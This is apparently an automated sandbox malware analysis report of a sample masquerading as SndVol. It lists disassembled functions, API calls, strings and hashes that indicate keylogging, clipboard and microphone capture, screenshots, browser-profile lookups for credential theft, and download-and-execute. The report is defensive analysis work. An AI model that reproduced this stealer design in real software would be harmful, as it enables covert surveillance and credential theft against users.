Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99

Function 00418A92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418ABE

Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A

SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B

Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD

Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682

Strings

image/jpeg, xrefs: 00418AD5

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Stream$GdipImage$Create$DisposeFromLoadSave
String ID: image/jpeg
API String ID: 1291196975-3785015651
Opcode ID: 6e04f8ac358d86261f340c02fc4254ea4fa5b72d51dab4b51890127c9f8658cf
Instruction ID: 71c7567624fb1f0fb67e5b365d5baafb3eed0516d04e2b9615b8e3d4f66a2876
Opcode Fuzzy Hash: 6e04f8ac358d86261f340c02fc4254ea4fa5b72d51dab4b51890127c9f8658cf
Instruction Fuzzy Hash: 13317F71504300AFC301EF65CC84DAFB7E9FF8A704F00496EF985A7251DB7999448BA6

Function 0536975F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 0536978B
SHCreateMemStream.SHLWAPI(00000000), ref: 053697D8

Strings

image/jpeg, xrefs: 053697A2

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: CreateStream
String ID: image/jpeg
API String ID: 1369699375-3785015651
Opcode ID: 8883413a241ecd6daa78ef1183ec8e175d09e4f7b2134cb7e7ff04ec22b53db4
Instruction ID: 845036e86e335e7a793c75b9582f3108fca219c1765c1a28bda21e98e62b3469
Opcode Fuzzy Hash: 8883413a241ecd6daa78ef1183ec8e175d09e4f7b2134cb7e7ff04ec22b53db4
Instruction Fuzzy Hash: 5E314F72604304AFC301EF64CC88D7FB7E9EF8A715F004A1DF98697251DB7599058BA2

Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

__Init_thread_footer.LIBCMT ref: 0040B797

Strings

[End of clipboard], xrefs: 0040B7D9
[Text copied to clipboard], xrefs: 0040B7E6

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]
API String ID: 1881088180-3686566968
Opcode ID: b75b6418a390f749317f2ab44173591ff602460dbf5675c7faf818e64fc176e3
Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
Opcode Fuzzy Hash: b75b6418a390f749317f2ab44173591ff602460dbf5675c7faf818e64fc176e3
Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C

Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12

Strings

OCP, xrefs: 00451B8B
ACP, xrefs: 00451B55

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C

Function 004162E4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004162F5

Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB

Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD

Strings

!D@, xrefs: 00417089
okmode, xrefs: 0041630F

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _wcslen$CloseCreateValue
String ID: !D@$okmode
API String ID: 3411444782-1942679189
Opcode ID: 33627434b7f82304c1ded9d3bb7774abf103e710ec097a6938a3706c33e36768
Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
Opcode Fuzzy Hash: 33627434b7f82304c1ded9d3bb7774abf103e710ec097a6938a3706c33e36768
Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D

Function 00418B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BAA

Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A

SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418BCF

Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD

Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682

Strings

image/png, xrefs: 00418BC1

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Stream$GdipImage$Create$DisposeFromLoadSave
String ID: image/png
API String ID: 1291196975-2966254431
Opcode ID: a27ec27d9e18f0a906ecaac1dc19e5732830617660cf953b76ad9b2867ca9ec8
Instruction ID: c6f894421d6f6d4ca6915e56eba1d7ff3797fde04a376feef2065c2e579c4a83
Opcode Fuzzy Hash: a27ec27d9e18f0a906ecaac1dc19e5732830617660cf953b76ad9b2867ca9ec8
Instruction Fuzzy Hash: 30219371204211AFC705EB61CC88CBFBBADEFCA754F10092EF54693161DB399945CBA6

Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087

Strings

KeepAlive | Enabled | Timeout: , xrefs: 0040501F

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 481472006-1507639952
Opcode ID: 5b49fe7ebc3dd67cdf94e38743eb20928709a3ec39b389cca4b516c591649347
Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
Opcode Fuzzy Hash: 5b49fe7ebc3dd67cdf94e38743eb20928709a3ec39b389cca4b516c591649347
Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF

Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00416640
URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: DownloadFileSleep
String ID: !D@
API String ID: 1931167962-604454484
Opcode ID: e2f37744b7fb9eb9058f71ff0aa918298059d13fe50ac3369e39da324d73493c
Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
Opcode Fuzzy Hash: e2f37744b7fb9eb9058f71ff0aa918298059d13fe50ac3369e39da324d73493c
Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A

Function 0041B4EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

%02i:%02i:%02i:%03i , xrefs: 0041B51E
| , xrefs: 0041B53C

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i
API String ID: 481472006-2430845779
Opcode ID: 9943bc0e607642414e1270e8ed0348d03c595322458554df1a59568979ca2f05
Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
Opcode Fuzzy Hash: 9943bc0e607642414e1270e8ed0348d03c595322458554df1a59568979ca2f05
Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A

Function 053667B7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 053667DC

Strings

!D@, xrefs: 05367D56
NG, xrefs: 0536680B

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: Event
String ID: !D@$NG
API String ID: 4201588131-2721294649
Opcode ID: e4d71aff3f2fe3f8721a960ccbb7594573a45445a8ec9114e4e6326f33baa27e
Instruction ID: 1cf8482b916525c303e52ed2259d98815fe283d93164774096b0e9dfdcfd8277
Opcode Fuzzy Hash: e4d71aff3f2fe3f8721a960ccbb7594573a45445a8ec9114e4e6326f33baa27e
Instruction Fuzzy Hash: C711A7766042449BD624FB74DC44EEF73E8AB95330F40496DEDA993190EF306A08C7A6

Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

CloseHandle.KERNEL32(?), ref: 0040B0B4
UnhookWindowsHookEx.USER32 ref: 0040B0C7

Strings

Online Keylogger Stopped, xrefs: 0040B061, 0040B069, 0040B090

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: 086a3c4929947be54678252dfea77875741b8c789e716d5a77e1f3bca4bdded6
Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
Opcode Fuzzy Hash: 086a3c4929947be54678252dfea77875741b8c789e716d5a77e1f3bca4bdded6
Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE

Function 053524B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

waveInPrepareHeader.WINMM(00474D94,00000020,00476BD4,00476BD4,00476B50,00474EE0,?,00000000,053526E2), ref: 05352516
waveInAddBuffer.WINMM(00474D94,00000020,?,00000000,053526E2), ref: 0535252C

Strings

XMG, xrefs: 053524C5

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: wave$BufferHeaderPrepare
String ID: XMG
API String ID: 2315374483-813777761
Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
Instruction ID: cd2f692fb01916245e9ccd5f0dab926871f51705bf79bea8f77a2af5e03d22da
Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
Instruction Fuzzy Hash: 7B0181B5700301AFD7109F64EC48E66BBE9FB892117014139F909C3761EB71AC91CFA4

Function 0536D7AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,0535570D), ref: 0536D7D6
LocalFree.KERNEL32(?,?), ref: 0536D7FC

Strings

PkGNG, xrefs: 0536D7AE

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: FormatFreeLocalMessage
String ID: PkGNG
API String ID: 1427518018-263838557
Opcode ID: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
Instruction ID: 2c08f987b682d95a4102c40cd8c4210e62c8789c1d00e88102785c0d35132850
Opcode Fuzzy Hash: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
Instruction Fuzzy Hash: C3F0C275B0020DBB9F18ABA5EC4DDFFB77DDF84221B10402AB916E2090EE606D058665

Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32

Strings

IsValidLocaleName, xrefs: 00448AF7, 00448B01
JD, xrefs: 00448B29, 00448B16

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: LocaleValid
String ID: IsValidLocaleName$JD
API String ID: 1901932003-2234456777
Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E

Function 05394459 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 053944A7

Strings

$G, xrefs: 0539448D

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: _free
String ID: $G
API String ID: 269201875-4251033865
Opcode ID: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
Instruction ID: a1786cca121f65442f305e3145198b3cbbe44e7f2711a6d67cb2c5ab942c8739
Opcode Fuzzy Hash: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
Instruction Fuzzy Hash: D9E0E5E2B0551050AF7DB23A6D0CB6B054ABBC2674F105226E528CA2C0EFA084539165

Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6

Strings

UserProfile, xrefs: 0040C4CA
\AppData\Local\Google\Chrome\, xrefs: 0040C4E0

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Google\Chrome\
API String ID: 1174141254-4188645398
Opcode ID: 0abb7ee2847cb982712fb7fefd416b01b1d23bf2ba6ce40aabdd3cde21ab4378
Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
Opcode Fuzzy Hash: 0abb7ee2847cb982712fb7fefd416b01b1d23bf2ba6ce40aabdd3cde21ab4378
Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE

Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559

Strings

\AppData\Local\Microsoft\Edge\, xrefs: 0040C543
UserProfile, xrefs: 0040C52D

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Microsoft\Edge\
API String ID: 1174141254-2800177040
Opcode ID: 0d29ba65b5b4eed9e3d7e50455c49f35e463ab29ad96f4d2c3ad675a2282e63f
Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
Opcode Fuzzy Hash: 0d29ba65b5b4eed9e3d7e50455c49f35e463ab29ad96f4d2c3ad675a2282e63f
Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE

Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC

Strings

AppData, xrefs: 0040C590
\Opera Software\Opera Stable\, xrefs: 0040C5A6

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: AppData$\Opera Software\Opera Stable\
API String ID: 1174141254-1629609700
Opcode ID: 421cc93c7b3529087b7bfe0f56a46d6b25e2e17e9998e8b4adf1b46cb1cdeea0
Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
Opcode Fuzzy Hash: 421cc93c7b3529087b7bfe0f56a46d6b25e2e17e9998e8b4adf1b46cb1cdeea0
Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA

Function 053944B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 053944FB

Strings

$G, xrefs: 053944E1

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: _free
String ID: $G
API String ID: 269201875-4251033865
Opcode ID: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
Instruction ID: 5ca5939436eba3647927c4f95562925acbd93ca2c5a660fb48ff861803352643
Opcode Fuzzy Hash: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
Instruction Fuzzy Hash: EEE02BD3B1152100EFBDA2393D0C77A058ABBC2335F219326E534C71D0EFA444538065

Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 0040B64B

Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1

Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662

Strings

[AltL], xrefs: 0040B68D
[AltR], xrefs: 0040B681

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
String ID: [AltL]$[AltR]
API String ID: 2738857842-2658077756
Opcode ID: b99914e28c38a6df7d0c4dd8e7e2660e658301fcb38244262cae42baa40b951a
Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
Opcode Fuzzy Hash: b99914e28c38a6df7d0c4dd8e7e2660e658301fcb38244262cae42baa40b951a
Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF

Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E

Strings

uD, xrefs: 0044ED05

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID: uD
API String ID: 0-2547262877
Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49

Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8

Strings

open, xrefs: 004161A2
!D@, xrefs: 00417089

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: !D@$open
API String ID: 587946157-1586967515
Opcode ID: 204c713d203efeff6b41638de090f7ddfc4dbb766d4a3fc6f87e83cad3270c1f
Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
Opcode Fuzzy Hash: 204c713d203efeff6b41638de090f7ddfc4dbb766d4a3fc6f87e83cad3270c1f
Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A

Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000012), ref: 0040B6A5

Strings

[CtrlL], xrefs: 0040B6D3
[CtrlR], xrefs: 0040B6C2

Memory Dump Source

